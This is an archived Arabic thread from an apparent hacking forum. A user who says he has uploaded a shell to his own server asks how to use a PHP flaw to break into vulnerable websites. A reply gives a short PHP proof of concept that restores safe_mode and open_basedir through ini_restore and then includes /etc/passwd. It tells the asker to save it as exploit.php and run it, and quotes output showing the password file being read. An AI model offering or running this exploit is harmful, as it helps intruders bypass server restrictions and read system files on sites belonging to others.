:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)

- - مساعدة (http://www.vbspiders.com/vb/showthread.php?t=50968)

مرحبا اريد احد يشرحلي هنا استغلال هذه الثغرة

http://securityreason.com/achievement_security*****/42

مع العلم انني نصبت السرفر الشخصي ورفعت عليه الشل والان لدي مواقع مصابة بهذه الثغرة فكيف اخترقها

أرجو المساعدة

ألا يوجد احد

وربى ياصاحبى كنت نفسى اساعدك ولكن ما عرفت

انا اسف صاحبى على تقصيرى اليك

بااااااااااااااااااااى

اقتباس:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

php ...

قم بترجمتها ...
اعمل مستند نص جديد وسميه مثلا exploit.php

بعد تشغيل الملف على السيرفر ...

اقتباس:

RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream:
Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for
inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ #
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
- ---